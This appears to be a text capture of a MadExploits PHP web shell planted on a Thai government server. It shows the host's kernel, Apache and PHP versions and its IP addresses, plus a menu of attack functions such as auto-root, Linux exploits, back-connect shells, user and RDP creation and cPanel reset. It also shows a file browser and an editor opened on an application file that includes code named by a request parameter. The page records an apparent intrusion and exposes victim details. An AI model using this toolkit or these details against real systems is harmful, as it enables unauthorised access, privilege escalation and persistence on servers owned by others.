Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
modules /
mail /
expand /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
index.php
1.1
KB
-rw-r--r--
maildetail.php
9.91
KB
-rw-r--r--
receive_pv.php
9.52
KB
-rw-r--r--
send_book.php
25.03
KB
-rw-r--r--
send_report_book.php
12.93
KB
-rw-r--r--
time_inc.php
4.99
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<?php session_start(); define( "_VALID_", 1 ); require_once "../../../amssplus_connect.php"; date_default_timezone_set('Asia/Bangkok'); foreach($_GET as $system_key => $system_key_val) { $_GET["$system_key"] =mysqli_real_escape_string($connect,$system_key_val); } ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AMSSPLUS</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="stylesheet" href="../../../css/mm_training.css" type="text/css" /> <link href="../../../css/dropdown/dropdown.css" media="all" rel="stylesheet" type="text/css" /> <link href="../../../css/dropdown/themes/adobe.com/default.advanced.css" media="all" rel="stylesheet" type="text/css" /> <script type="text/javascript" src="../../../main_js.js"></script> </head> <?php require_once("../../../smss/function.php"); require_once "../../../smss/sync.php"; GETMODULE($_REQUEST['file']); require_once("".$MODPATHFILE."") ; mysqli_close($connect); ?>
Close